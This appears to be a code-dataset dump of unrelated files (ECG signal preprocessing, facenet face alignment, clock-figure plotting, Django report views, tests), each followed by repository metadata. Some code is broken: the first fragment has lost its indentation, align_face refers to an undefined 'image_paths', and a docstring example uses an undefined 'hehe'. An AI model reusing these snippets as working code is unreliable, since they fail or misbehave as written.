clustergrid = sns.clustermap(X_filtrado_normal_DF, method='ward', row_colors=row_colors, col_cluster=False, figsize=(20,10), cmap="YlGnBu", yticklabels=False)
# To add the reordered labels. Right now the colors do not show up in the
# column where they should. I suspect this is because the ids do not match.
#'''
ordering = clustergrid.dendrogram_row.reordered_ind
labels_list = [x for _, x in sorted(zip(ordering,labels), key=lambda pair: pair[0])]
labels = pd.Series(labels_list, index=X_filtrado_normal_DF.index, name='cluster')
lut = dict(zip(set(labels), sns.color_palette(palette="Blues_d", n_colors=n_clusters_ward)))
row_colors = pd.DataFrame(labels)['cluster'].map(lut)
clustergrid = sns.clustermap(X_filtrado_normal_DF, method='ward', row_colors=row_colors, col_cluster=False, figsize=(20,10), cmap="YlGnBu", yticklabels=False)
#'''
#plt.savefig("dendograma.png")
# ----------------------- HEATMAPS -----------------------
#'''
plt.figure(1)
centers = pd.DataFrame(alg_kmeans.cluster_centers_, columns=list(X))
centers_desnormal = centers.copy()
centers_desnormal = centers.drop([4])
# Compute the centroids
X = pd.concat([X, clusters_ward], axis=1)
for variable in list(centers):
for k_cluster in range(n_clusters_ward):
centroide = X.loc[(clusters_ward['cluster']==k_cluster)][variable].mean()
centers_desnormal.loc[k_cluster, variable] = centroide
# Normalize
centers_normal2 = centers_desnormal.copy()
centers_normal2 = (centers_normal2 - centers_normal2.min() ) / (centers_normal2.max() - centers_normal2.min())
import matplotlib.pyplot as plt
heatmap_fig, ax = plt.subplots(figsize=(10,10))
heatmap = sns.heatmap(centers_normal2, cmap="YlGnBu", annot=centers_desnormal, fmt='.3f')
# Prevent the top and bottom heatmap blocks from being cut in half
bottom, top = ax.get_ylim()
ax.set_ylim(bottom + 0.5, top - 0.5)
#heatmap_fig.savefig("heatmap.png")
#'''
| 37.468852 | 187 | 0.651995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,561 | 0.398236 |
c7c71735421912226dadf924d3330fb19e4f6af5 | 9,029 | py | Python | signal_processing/ecg_preproc.py | DeepPSP/cpsc2020 | 47acb884ea1f2f819e564d8a17ad37001ed0df27 | [
"BSD-3-Clause"
]
| 1 | 2021-12-07T11:44:48.000Z | 2021-12-07T11:44:48.000Z | signal_processing/ecg_preproc.py | wenh06/cpsc2020 | 47acb884ea1f2f819e564d8a17ad37001ed0df27 | [
"BSD-3-Clause"
]
| null | null | null | signal_processing/ecg_preproc.py | wenh06/cpsc2020 | 47acb884ea1f2f819e564d8a17ad37001ed0df27 | [
"BSD-3-Clause"
]
| 1 | 2021-05-25T14:56:02.000Z | 2021-05-25T14:56:02.000Z | """
preprocess of (single lead) ecg signal:
band pass --> remove baseline --> find rpeaks --> denoise (mainly deal with motion artefact)
TODO:
1. motion artefact detection,
and slice the signal into continuous (no motion artefact within) segments
2. to add
References:
-----------
[1] https://github.com/PIA-Group/BioSPPy
[2] to add
"""
import os, time
import multiprocessing as mp
from copy import deepcopy
from numbers import Real
from typing import Union, Optional, Any, List, Dict
import numpy as np
from easydict import EasyDict as ED
from scipy.ndimage.filters import median_filter
from scipy.signal.signaltools import resample
from scipy.io import savemat
# from scipy.signal import medfilt
# https://github.com/scipy/scipy/issues/9680
try:
from biosppy.signals.tools import filter_signal
except:
from references.biosppy.biosppy.signals.tools import filter_signal
from cfg import PreprocCfg
from .ecg_rpeaks import (
xqrs_detect, gqrs_detect, pantompkins,
hamilton_detect, ssf_detect, christov_detect, engzee_detect, gamboa_detect,
)
from .ecg_rpeaks_dl import seq_lab_net_detect
__all__ = [
"preprocess_signal",
"parallel_preprocess_signal",
"denoise_signal",
]
QRS_DETECTORS = {
"xqrs": xqrs_detect,
"gqrs": gqrs_detect,
"pantompkins": pantompkins,
"hamilton": hamilton_detect,
"ssf": ssf_detect,
"christov": christov_detect,
"engzee": engzee_detect,
"gamboa": gamboa_detect,
"seq_lab": seq_lab_net_detect,
}
DL_QRS_DETECTORS = [
"seq_lab",
]
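# NOTE: detectors listed in DL_QRS_DETECTORS are deep-learning based and are
# dispatched once over the full signal instead of inside the multiprocessing
# pool (see `parallel_preprocess_signal` below).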
def preprocess_signal(raw_sig:np.ndarray, fs:Real, config:Optional[ED]=None) -> Dict[str, np.ndarray]:
""" finished, checked,
Parameters:
-----------
raw_sig: ndarray,
the raw ecg signal
fs: real number,
sampling frequency of `raw_sig`
config: dict, optional,
extra process configuration,
`PreprocCfg` will be updated by this `config`
Returns:
--------
retval: dict,
with items
- 'filtered_ecg': the array of the processed ecg signal
- 'rpeaks': the array of indices of rpeaks; empty if 'rpeaks' in `config` is not set
NOTE:
-----
output (`retval`) are resampled to have sampling frequency
equal to `config.fs` (if `config` has item `fs`) or `PreprocCfg.fs`
"""
filtered_ecg = raw_sig.copy()
cfg = deepcopy(PreprocCfg)
cfg.update(config or {})
if fs != cfg.fs:
filtered_ecg = resample(filtered_ecg, int(round(len(filtered_ecg)*cfg.fs/fs)))
# remove baseline
if 'baseline' in cfg.preproc:
window1 = 2 * (cfg.baseline_window1 // 2) + 1 # window size must be odd
window2 = 2 * (cfg.baseline_window2 // 2) + 1
baseline = median_filter(filtered_ecg, size=window1, mode='nearest')
baseline = median_filter(baseline, size=window2, mode='nearest')
filtered_ecg = filtered_ecg - baseline
# filter signal
if 'bandpass' in cfg.preproc:
filtered_ecg = filter_signal(
signal=filtered_ecg,
ftype='FIR',
band='bandpass',
order=int(0.3 * fs),
sampling_rate=fs,
frequency=cfg.filter_band,
)['signal']
if cfg.rpeaks and cfg.rpeaks.lower() not in DL_QRS_DETECTORS:
# dl detectors not for parallel computing using `mp`
detector = QRS_DETECTORS[cfg.rpeaks.lower()]
rpeaks = detector(sig=filtered_ecg, fs=fs).astype(int)
else:
rpeaks = np.array([], dtype=int)
retval = ED({
"filtered_ecg": filtered_ecg,
"rpeaks": rpeaks,
})
return retval
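# Minimal usage sketch (hedged: the 400 Hz sampling rate mirrors the example at
# the bottom of this file and is an assumption, not a requirement):
#   processed = preprocess_signal(raw_sig, fs=400, config=ED({"rpeaks": "xqrs"}))
#   filtered, rpeaks = processed["filtered_ecg"], processed["rpeaks"]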
def parallel_preprocess_signal(raw_sig:np.ndarray, fs:Real, config:Optional[ED]=None, save_dir:Optional[str]=None, save_fmt:str='npy', verbose:int=0) -> Dict[str, np.ndarray]:
""" finished, checked,
Parameters:
-----------
raw_sig: ndarray,
the raw ecg signal
fs: real number,
sampling frequency of `raw_sig`
config: dict, optional,
extra process configuration,
        `PreprocCfg` will be updated by this `config`
save_dir: str, optional,
directory for saving the outcome ('filtered_ecg' and 'rpeaks')
save_fmt: str, default 'npy',
format of the save files, 'npy' or 'mat'
Returns:
--------
retval: dict,
with items
- 'filtered_ecg': the array of the processed ecg signal
- 'rpeaks': the array of indices of rpeaks; empty if 'rpeaks' in `config` is not set
NOTE:
-----
output (`retval`) are resampled to have sampling frequency
equal to `config.fs` (if `config` has item `fs`) or `PreprocCfg.fs`
"""
start_time = time.time()
cfg = deepcopy(PreprocCfg)
cfg.update(config or {})
epoch_len = int(cfg.parallel_epoch_len * fs)
epoch_overlap_half = int(cfg.parallel_epoch_overlap * fs) // 2
epoch_overlap = 2 * epoch_overlap_half
epoch_forward = epoch_len - epoch_overlap
if len(raw_sig) <= 3 * epoch_len: # too short, no need for parallel computing
retval = preprocess_signal(raw_sig, fs, cfg)
if cfg.rpeaks and cfg.rpeaks.lower() in DL_QRS_DETECTORS:
rpeaks = QRS_DETECTORS[cfg.rpeaks.lower()](sig=raw_sig, fs=fs, verbose=verbose).astype(int)
retval.rpeaks = rpeaks
return retval
l_epoch = [
raw_sig[idx*epoch_forward: idx*epoch_forward + epoch_len] \
for idx in range((len(raw_sig)-epoch_overlap)//epoch_forward)
]
if cfg.parallel_keep_tail:
tail_start_idx = epoch_forward * len(l_epoch) + epoch_overlap
if len(raw_sig) - tail_start_idx < 30 * fs: # less than 30s, make configurable?
# append to the last epoch
l_epoch[-1] = np.append(l_epoch[-1], raw_sig[tail_start_idx:])
else: # long enough
tail_epoch = raw_sig[tail_start_idx-epoch_overlap:]
l_epoch.append(tail_epoch)
cpu_num = max(1, mp.cpu_count()-3)
with mp.Pool(processes=cpu_num) as pool:
result = pool.starmap(
func=preprocess_signal,
iterable=[(e, fs, cfg) for e in l_epoch],
)
if cfg.parallel_keep_tail:
tail_result = result[-1]
result = result[:-1]
filtered_ecg = result[0]['filtered_ecg'][:epoch_len-epoch_overlap_half]
rpeaks = result[0]['rpeaks'][np.where(result[0]['rpeaks']<epoch_len-epoch_overlap_half)[0]]
for idx, e in enumerate(result[1:]):
filtered_ecg = np.append(
filtered_ecg, e['filtered_ecg'][epoch_overlap_half: -epoch_overlap_half]
)
epoch_rpeaks = e['rpeaks'][np.where( (e['rpeaks'] >= epoch_overlap_half) & (e['rpeaks'] < epoch_len-epoch_overlap_half) )[0]]
rpeaks = np.append(rpeaks, (idx+1)*epoch_forward + epoch_rpeaks)
if cfg.parallel_keep_tail:
filtered_ecg = np.append(filtered_ecg, tail_result['filtered_ecg'][epoch_overlap_half:])
tail_rpeaks = tail_result['rpeaks'][np.where(tail_result['rpeaks'] >= epoch_overlap_half)[0]]
rpeaks = np.append(rpeaks, len(result)*epoch_forward + tail_rpeaks)
if verbose >= 1:
if cfg.rpeaks.lower() in DL_QRS_DETECTORS:
print(f"signal processing took {round(time.time()-start_time, 3)} seconds")
else:
print(f"signal processing and R peaks detection took {round(time.time()-start_time, 3)} seconds")
start_time = time.time()
if cfg.rpeaks and cfg.rpeaks.lower() in DL_QRS_DETECTORS:
rpeaks = QRS_DETECTORS[cfg.rpeaks.lower()](sig=raw_sig, fs=fs, verbose=verbose).astype(int)
if verbose >= 1:
print(f"R peaks detection using {cfg.rpeaks} took {round(time.time()-start_time, 3)} seconds")
if save_dir:
# NOTE: this part is not tested
os.makedirs(save_dir, exist_ok=True)
if save_fmt.lower() == 'npy':
np.save(os.path.join(save_dir, "filtered_ecg.npy"), filtered_ecg)
np.save(os.path.join(save_dir, "rpeaks.npy"), rpeaks)
elif save_fmt.lower() == 'mat':
# save into 2 files, keep in accordance
savemat(os.path.join(save_dir, "filtered_ecg.mat"), {"filtered_ecg": filtered_ecg}, format='5')
savemat(os.path.join(save_dir, "rpeaks.mat"), {"rpeaks": rpeaks}, format='5')
retval = ED({
"filtered_ecg": filtered_ecg,
"rpeaks": rpeaks,
})
return retval
"""
to check correctness of the function `parallel_preprocess_signal`,
say for record A01, one can call
>>> raw_sig = loadmat("./data/A01.mat")['ecg'].flatten()
>>> processed = parallel_preprocess_signal(raw_sig, 400)
>>> print(len(processed['filtered_ecg']) - len(raw_sig))
>>> start_t = int(3600*24.7811)
>>> len_t = 10
>>> fig, ax = plt.subplots(figsize=(20,6))
>>> ax.plot(hehe['filtered_ecg'][start_t*400:(start_t+len_t)*400])
>>> for r in [p for p in hehe['rpeaks'] if start_t*400 <= p < (start_t+len_t)*400]:
>>> ax.axvline(r-start_t*400,c='red',linestyle='dashed')
>>> plt.show()
or one can use the 'dataset.py'
"""
| 34.59387 | 175 | 0.646694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,572 | 0.395614 |
c7c75c3cc68eb1ff8bc4c52efd3bee52faa60a5f | 761 | bzl | Python | ocaml/bootstrap.bzl | mobileink/obazl | eb9d10d1aac040dbc05a038265276e3ab3a52233 | [
"Apache-2.0"
]
| null | null | null | ocaml/bootstrap.bzl | mobileink/obazl | eb9d10d1aac040dbc05a038265276e3ab3a52233 | [
"Apache-2.0"
]
| null | null | null | ocaml/bootstrap.bzl | mobileink/obazl | eb9d10d1aac040dbc05a038265276e3ab3a52233 | [
"Apache-2.0"
]
| null | null | null | ## mv to //:WORKSPACE.bzl ocaml_configure
load("//ocaml/_bootstrap:ocaml.bzl", _ocaml_configure = "ocaml_configure")
# load("//ocaml/_bootstrap:obazl.bzl", _obazl_configure = "obazl_configure")
load("//ocaml/_rules:ocaml_repository.bzl" , _ocaml_repository = "ocaml_repository")
# load("//ocaml/_rules:opam_configuration.bzl" , _opam_configuration = "opam_configuration")
# load("//ocaml/_toolchains:ocaml_toolchains.bzl",
# _ocaml_toolchain = "ocaml_toolchain",
# _ocaml_register_toolchains = "ocaml_register_toolchains")
# obazl_configure = _obazl_configure
ocaml_configure = _ocaml_configure
ocaml_repository = _ocaml_repository
# ocaml_toolchain = _ocaml_toolchain
# ocaml_register_toolchains = _ocaml_register_toolchains
| 38.05 | 96 | 0.768725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 607 | 0.797635 |
c7c963a523b032b23261574567ab5a4c018c9176 | 44 | py | Python | tsts.py | tedtroxell/metrician | d4164dbff8db5645ee8beca11dc55ba6c26c4cb6 | [
"MIT"
]
| null | null | null | tsts.py | tedtroxell/metrician | d4164dbff8db5645ee8beca11dc55ba6c26c4cb6 | [
"MIT"
]
| null | null | null | tsts.py | tedtroxell/metrician | d4164dbff8db5645ee8beca11dc55ba6c26c4cb6 | [
"MIT"
]
| null | null | null | from metrician.explainations.tests import *
| 22 | 43 | 0.840909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
c7c9b4be102dc7ada3fac5b424f329fc54878619 | 3,021 | py | Python | simple/facenet.py | taflahi/facenet | 64e74744437e18978782b497b42300b8d4a2342b | [
"MIT"
]
| 5 | 2018-09-25T21:04:39.000Z | 2020-09-03T20:07:37.000Z | simple/facenet.py | SoloSynth1/facenet | 64e74744437e18978782b497b42300b8d4a2342b | [
"MIT"
]
| null | null | null | simple/facenet.py | SoloSynth1/facenet | 64e74744437e18978782b497b42300b8d4a2342b | [
"MIT"
]
| 14 | 2018-10-15T00:03:24.000Z | 2020-08-11T05:04:24.000Z | import tensorflow as tf
from .. src.align import detect_face
from .. src import facenet
from .. simple import download_model
import sys
import os
from os.path import expanduser
import copy
import cv2
import numpy as np
from scipy import spatial
minsize = 20 # minimum size of face
threshold = [0.6, 0.7, 0.7] # three steps's threshold
factor = 0.709 # scale factor
def align_face(images, image_size=160, margin=11):
with tf.Graph().as_default():
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False))
with sess.as_default():
pnet, rnet, onet = detect_face.create_mtcnn(sess, None)
tmp_image_paths = copy.copy(images)
img_list = []
for image in tmp_image_paths:
img = cv2.imread(os.path.expanduser(image))[:, :, ::-1]
img_size = np.asarray(img.shape)[0:2]
bounding_boxes, _ = detect_face.detect_face(
img, minsize, pnet, rnet, onet, threshold, factor)
if len(bounding_boxes) < 1:
image_paths.remove(image)
print("can't detect face, remove ", image)
continue
det = np.squeeze(bounding_boxes[0, 0:4])
bb = np.zeros(4, dtype=np.int32)
bb[0] = np.maximum(det[0] - margin / 2, 0)
bb[1] = np.maximum(det[1] - margin / 2, 0)
bb[2] = np.minimum(det[2] + margin / 2, img_size[1])
bb[3] = np.minimum(det[3] + margin / 2, img_size[0])
cropped = img[bb[1]:bb[3], bb[0]:bb[2], :]
aligned = cv2.resize(cropped[:, :, ::-1],
(image_size, image_size))[:, :, ::-1]
prewhitened = facenet.prewhiten(aligned)
img_list.append(prewhitened)
images = np.stack(img_list)
return images
def embedding(images):
# check is model exists
home = expanduser('~')
model_path = home + '/.facenet_model/20180408-102900/20180408-102900.pb'
if not os.path.exists(model_path):
print("model not exists, downloading model")
download_model.download()
print("model downloaded to " + model_path)
with tf.Graph().as_default():
with tf.Session() as sess:
facenet.load_model(model_path)
# Get input and output tensors
images_placeholder = tf.get_default_graph().get_tensor_by_name("input:0")
embeddings = tf.get_default_graph().get_tensor_by_name("embeddings:0")
phase_train_placeholder = tf.get_default_graph().get_tensor_by_name("phase_train:0")
# Run forward pass to calculate embeddings
feed_dict = {images_placeholder: images,
phase_train_placeholder: False}
emb = sess.run(embeddings, feed_dict=feed_dict)
return emb
def compare(images, threshold=0.7):
emb = embedding(images)
sims = np.zeros((len(images), len(images)))
for i in range(len(images)):
for j in range(len(images)):
sims[i][j] = (
1 - spatial.distance.cosine(emb[i], emb[j]) > threshold)
return sims
| 35.127907 | 96 | 0.620655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 336 | 0.111221 |
c7cb28d53e6c7e1382fc471314a689bf2b0e9252 | 172 | py | Python | athena/athena/errors.py | aculich/openmappr | c9e5b4cfc974a6eda9cbc8a0ea6f8a96ce35efba | [
"MIT"
]
| 19 | 2018-04-05T23:33:33.000Z | 2022-03-24T00:18:20.000Z | athena/athena/errors.py | aculich/openmappr | c9e5b4cfc974a6eda9cbc8a0ea6f8a96ce35efba | [
"MIT"
]
| 13 | 2018-01-10T23:31:11.000Z | 2018-07-20T12:55:02.000Z | athena/athena/errors.py | aculich/openmappr | c9e5b4cfc974a6eda9cbc8a0ea6f8a96ce35efba | [
"MIT"
]
| 5 | 2018-02-12T05:33:19.000Z | 2019-09-21T22:43:02.000Z |
class AthenaError(Exception):
"""base class for all athena exceptions"""
pass
class AthenaMongoError(AthenaError):
"""Class for all mongo related errors"""
pass | 21.5 | 46 | 0.726744 | 169 | 0.982558 | 0 | 0 | 0 | 0 | 0 | 0 | 82 | 0.476744 |
c7cb2a8553964cb9e86d2c3de96decefdde5eb6c | 89 | py | Python | tf2stats/__init__.py | TheAntecedent/Quintessence | f32dc1b11ded212121ebc0f925d15c845cb6ea4b | [
"MIT"
]
| 1 | 2019-10-08T04:38:08.000Z | 2019-10-08T04:38:08.000Z | tf2stats/__init__.py | TheAntecedent/Quintessence | f32dc1b11ded212121ebc0f925d15c845cb6ea4b | [
"MIT"
]
| 1 | 2021-04-30T20:51:05.000Z | 2021-04-30T20:51:05.000Z | tf2stats/__init__.py | TheAntecedent/Quintessence | f32dc1b11ded212121ebc0f925d15c845cb6ea4b | [
"MIT"
]
| null | null | null | from .aggregated_stats import *
from .game_stats import *
from .stat_definitions import * | 29.666667 | 31 | 0.808989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
c7cb514f4b628937e89d11a214a0267002c52972 | 1,515 | py | Python | tests/test_messages/test_inbound/test_manage_all_link_record.py | michaeldavie/pyinsteon | e5b2e2910f4eff1474f158051fa71f75c2077dd6 | [
"MIT"
]
| 15 | 2020-07-08T05:29:14.000Z | 2022-03-24T18:56:26.000Z | tests/test_messages/test_inbound/test_manage_all_link_record.py | michaeldavie/pyinsteon | e5b2e2910f4eff1474f158051fa71f75c2077dd6 | [
"MIT"
]
| 107 | 2019-06-03T09:23:02.000Z | 2022-03-31T23:12:38.000Z | tests/test_messages/test_inbound/test_manage_all_link_record.py | michaeldavie/pyinsteon | e5b2e2910f4eff1474f158051fa71f75c2077dd6 | [
"MIT"
]
| 16 | 2019-01-24T01:09:49.000Z | 2022-02-24T03:48:42.000Z | """Test Manage All-Link Record."""
import unittest
from binascii import unhexlify
from pyinsteon.address import Address
from pyinsteon.constants import AckNak, ManageAllLinkRecordAction, MessageId
from pyinsteon.protocol.messages.all_link_record_flags import \
AllLinkRecordFlags
from tests import set_log_levels
from tests.utils import hex_to_inbound_message
# pylint: disable=no-member
class TestManageAllLinkRecord(unittest.TestCase):
"""Test Manage All-Link Record."""
def setUp(self):
"""Set up test."""
self.hex = "026F400405060708090a0b"
self.hex_ack = "026F400405060708090a0b06"
self.message_id = MessageId(0x6F)
self.action = ManageAllLinkRecordAction(0x40)
self.flags = AllLinkRecordFlags(0x04)
self.group = int(0x05)
self.address = Address("060708")
self.data1 = int(0x09)
self.data2 = int(0x0A)
self.data3 = int(0x0B)
self.ack = AckNak(0x06)
self.msg, self.msg_bytes = hex_to_inbound_message(self.hex_ack)
set_log_levels(
logger="info",
logger_pyinsteon="info",
logger_messages="info",
logger_topics=False,
)
def test_id(self):
"""Test ID."""
assert self.msg.message_id == self.message_id
def test_ack_nak(self):
"""Test ACK/NAK."""
assert self.msg.ack == self.ack
def test_bytes(self):
"""Test bytes."""
assert bytes(self.msg) == unhexlify(self.hex_ack)
| 30.3 | 76 | 0.654785 | 1,119 | 0.738614 | 0 | 0 | 0 | 0 | 0 | 0 | 239 | 0.157756 |
c7cbc44076f7cb93b253c24fadcf22b9899a01e8 | 5,054 | py | Python | Clock/Clock_Fig3F.py | chAwater/OpenFig | d37d59c6a77d76c7d8a9e8623ce94a95406f1843 | [
"MIT"
]
| null | null | null | Clock/Clock_Fig3F.py | chAwater/OpenFig | d37d59c6a77d76c7d8a9e8623ce94a95406f1843 | [
"MIT"
]
| null | null | null | Clock/Clock_Fig3F.py | chAwater/OpenFig | d37d59c6a77d76c7d8a9e8623ce94a95406f1843 | [
"MIT"
]
| null | null | null | #!/usr/bin/env python
# coding: utf-8
# # Figure Info.
#
# | Title | Journal | Authors | Article Date | Code Date | Figure | Links |
# |:------|:-------:|:-------:|:------------:|:---------:|:------:|:-----:|
# |A microfluidic approach for experimentally modelling <br> the intercellular coupling system of a mammalian <br> circadian clock at single-cell level|Lab on a Chip|Kui Han|2020.03.02|2020.03.11| Fig3F | [DOI](https://doi.org/10.1039/D0LC00140F) |
#
# In[1]:
# data_file = 'SinPeaksDOWN.xls'
# new_inputs = pd.read_excel(data_file,header=None)
# new_inputs.to_csv('data.csv',index=False)
# In[2]:
import os, sys, warnings
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['svg.fonttype'] = 'none'
sns.set_context(context='poster')
bigsize = 20
midsize = 18
smallsize = 14
hugesize = 24
# In[ ]:
# Load data
new_inputs = pd.read_csv('data.csv')
new_inputs = new_inputs.values.flatten()
new_inputs = new_inputs[~np.isnan(new_inputs)]
new_inputs = pd.Series(new_inputs)
dict_time = new_inputs.astype(int).value_counts()
# Set start and end days
d_min = np.floor( ((new_inputs-12)/24).astype(np.float).min() )
d_min = max(0, d_min)
d_max = np.ceil( ((new_inputs-12)/24).astype(np.float).max() )
drug_time = 22 + np.arange(0,d_max+1)*24
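# Reading of the plotting below (an assumption, not stated in the data): a drug
# pulse is applied at hour 22 of each recording day (absolute hours) and drawn
# as a 2 h wide wedge on each dial.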
# Set plot
n_plot = int( d_max - d_min + 1 )
n_rows = int( np.ceil(n_plot/4) )
ratio_dfs_dict = dict(zip(np.arange(n_plot), [pd.DataFrame()]*n_plot))
fig, axs = plt.subplots(
ncols=4,nrows=n_rows,
figsize=(18,n_rows*4),
subplot_kw={'polar':True},
gridspec_kw={'hspace':0.5},
)
axs = axs.flatten()
# Plot data for each 24h
for i_time in dict_time.keys():
if i_time<12:
continue
d_time = int( np.floor((i_time-12)/24)-d_min )
# In one day
ratio_df = ratio_dfs_dict[d_time]
ratio_df = ratio_df.append(
{
'ref_time' : ((i_time-12) % 24),
'n' : dict_time[i_time]
}, ignore_index=True)
ratio_dfs_dict[d_time] = ratio_df
    # Map the time of day (hours) to an angle (radians) on the polar dial
t_time = (((i_time-12) % 24)/24)*2*np.pi
t_drug = ((1+drug_time[d_time]-12)%24)/24*2*np.pi
axs[d_time].bar(t_drug, 1, width=2/24*2*np.pi, bottom=0.0, color='bisque', edgecolor='k', alpha=0.7, zorder=10)
axs[d_time].scatter(t_time, 0.5, color='dodgerblue', s=dict_time[i_time]*30, alpha=0.7, zorder=20)
# Plot info for each 24h
for i,ax in enumerate(axs):
labels = (12+np.arange(24*(d_min+i),24*(d_min+i+1),6)).astype(int).astype(str)
labels[0] = str( int(labels[0])+24 ) + ' / ' + labels[0]
labels[2] = labels[2] + ' h'
ax.set_xticklabels( labels, fontsize=midsize )
ax.set_yticklabels([])
ax.tick_params(axis='x', pad=0)
ratio_df = ratio_dfs_dict[i]
if ratio_df.shape[0]!=0:
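        # Share of cells whose peak falls in the 10-14 h window (the Q3 bin
        # defined below); the percentage is annotated near the center of the dial.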
r_df = pd.concat(
[
ratio_df['n'],
pd.cut(
ratio_df['ref_time'],
bins =[0, 3, 10, 14, 24 ],
labels=[ 'Q1','Q2','Q3','Q4'],
include_lowest=True,
)
], axis=1
).groupby('ref_time').sum()
r = np.round( 100*(r_df.loc['Q3']/r_df.sum())['n'], 1 )
ax.text( 12/24*2*np.pi, -0.5, str(r)+'%', fontsize=smallsize, ha='center', va='center', color='tomato' )
ax.plot(
np.linspace(10, 14, 20)/24*2*np.pi,
[0.05]*20,
lw=5, color='tomato',alpha=0.7,
zorder=20,
)
ax.set_thetagrids([0,90,180,270])
ax.set_theta_zero_location('N')
ax.set_theta_direction(-1)
ax.set_rgrids([])
ax.set_rlim(0,1)
ax.set_rorigin(-1.0)
ax.annotate(
s='',
xytext=(np.pi/8,1),
xy=(np.pi*3/8,1),
size=40,
arrowprops={
'facecolor':'black',
'arrowstyle':'->',
'connectionstyle':"arc3,rad=-0.17",
},
)
ax.text(np.pi/4,1,'Time',fontsize=smallsize, rotation=-40, ha='center',va='bottom')
else:
lgs = []
for s in np.arange(5,30,5):
lg = ax.scatter(s, 0.5, color='dodgerblue', s=s*30, alpha=0.7, zorder=1, label=s)
lgs.append(lg)
lg = ax.scatter(1,1,marker='s',s=300, color='bisque', edgecolor='k', alpha=0.7, label='Drug')
lgs.append(lg)
ax.set_rlim(0,0.1)
ax.axis('off')
ax.legend(
handles=lgs,
ncol=2,
title='# of cells',
title_fontsize=midsize,
fontsize=smallsize,
frameon=False,
labelspacing=1.5,
handletextpad=0.2,
columnspacing=0.4,
)
fig.subplots_adjust(hspace=0.3)
fig.suptitle('Cells distribution under drug treatment', y=1, fontsize=hugesize)
fig.savefig('Clock_Fig3F.svg', transparent=True, bbox_inches='tight')
fig.savefig('Clock_Fig3F.png', transparent=True, bbox_inches='tight')
plt.show()
# In[ ]:
| 28.234637 | 248 | 0.564108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,142 | 0.22596 |
c7cbd8f6da109df8e878fcc548912f6a3815a1c2 | 10,733 | py | Python | rameniaapp/views/report.py | awlane/ramenia | 6bf8e75a1f279ac584daa4ee19927ffccaa67551 | [
"MIT"
]
| null | null | null | rameniaapp/views/report.py | awlane/ramenia | 6bf8e75a1f279ac584daa4ee19927ffccaa67551 | [
"MIT"
]
| null | null | null | rameniaapp/views/report.py | awlane/ramenia | 6bf8e75a1f279ac584daa4ee19927ffccaa67551 | [
"MIT"
]
| null | null | null | from django.shortcuts import render, HttpResponse, HttpResponseRedirect
from django.template import loader
from django.conf import settings
from django.contrib.auth.models import User
from rameniaapp.models import ReviewReport, ProfileReport, NoodleReport, Report, Review, Profile, Noodle
from django.views.generic import ListView, FormView, CreateView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.decorators import login_required
from rameniaapp.decorators import user_is_moderator
from rameniaapp.actionhookutils import dispatch_hook
from rameniaapp.utils import UserIsModeratorMixin
from django.forms.widgets import Select
from django.contrib import messages
class ReportForm(LoginRequiredMixin, CreateView):
'''Class based view for creating reports'''
template_name = "report_form.html"
model = Report
success_url = "/app"
fields = ["reason"]
url_path = "/app"
login_url="/app/login"
def get_form(self, form_class=None):
form = super(ReportForm, self).get_form(form_class)
form.fields['reason'].widget.attrs.update({'class':'form-control'})
return form
def form_valid(self, form):
'''Ensures hidden form values are filled'''
form.instance.reporter = self.request.user
form.instance.status = 'OP'
return super().form_valid(form)
def get_context_data(self, **kwargs):
'''Adds url_path value and relevant object id to template'''
context = super().get_context_data(**kwargs)
context["id"] = self.kwargs["id"]
context["url_path"] = self.url_path
return context
class NoodleReportForm(ReportForm):
'''Class based view for reporting noodles'''
model = NoodleReport
#This is used to allow the form to create the correct object
url_path = "noodle_report"
def form_valid(self, form):
'''Ensures hidden form values are filled'''
form.instance.noodle = Noodle.objects.get(pk=self.kwargs["id"])
form.instance.type = 'ND'
return super().form_valid(form)
def get_context_data(self, **kwargs):
'''Passes item name to template'''
context = super().get_context_data(**kwargs)
context["name"] = Noodle.objects.get(pk=self.kwargs["id"]).name
return context
class ReviewReportForm(ReportForm):
'''Class based view for reporting reviews'''
model = ReviewReport
url_path = "review_report"
def form_valid(self, form):
'''Ensures hidden form values are filled'''
form.instance.review = Review.objects.get(pk=self.kwargs["id"])
form.instance.type = 'RV'
return super().form_valid(form)
def get_context_data(self, **kwargs):
'''Passes item name to template'''
context = super().get_context_data(**kwargs)
context["name"] = Review.objects.get(pk=self.kwargs["id"]).title
return context
class ProfileReportForm(ReportForm):
'''Class based view for reporting profile'''
model = ProfileReport
url_path = "profile_report"
def form_valid(self, form):
'''Ensures hidden form values are filled'''
form.instance.profile = Profile.objects.get(pk=self.kwargs["id"])
form.instance.type = 'PF'
return super().form_valid(form)
def get_context_data(self, **kwargs):
'''Passes item name to template'''
context = super().get_context_data(**kwargs)
context["name"] = Profile.objects.get(pk=self.kwargs["id"]).name
return context
class ReportList(LoginRequiredMixin, UserIsModeratorMixin, ListView):
'''Class based view for viewing reports'''
    # These values are overridden in the subclasses so we can handle
    # multiple types of reports without rewriting code
model = Report
item_type = ""
context_object_name = "reports"
template_name = "report_view.html"
login_url="/app/login"
def get_queryset(self):
'''Get all reports for specific objects'''
if "item_id" in self.kwargs:
item_tuple = self.get_item(self.kwargs["item_id"])
self.kwargs[item_tuple[0]] = item_tuple[1]
# This prevents the next line from breaking
del self.kwargs["item_id"]
# Using get_item, this lets us filter for any kind of object without
# writing extra code
return self.model.objects.filter(**self.kwargs)
def get_item(self, id):
'''Returns a tuple containing the key name and item'''
return (None, None)
def get_context_data(self, **kwargs):
'''Knowing the item type lets us not break things'''
context = super().get_context_data(**kwargs)
context['item_type'] = self.item_type
return context
class NoodleReportList(ReportList):
'''List of noodle reports'''
model = NoodleReport
item_type = "Noodles"
def get_item(self, id):
'''Returns a tuple containing the key name and item'''
noodle = Noodle.objects.get(id=id)
return ("noodle", noodle)
class ReviewReportList(ReportList):
'''List of review reports'''
model = ReviewReport
item_type = "Reviews"
def get_item(self, id):
'''Returns a tuple containing the key name and item'''
review = Review.objects.get(id=id)
return ("review", review)
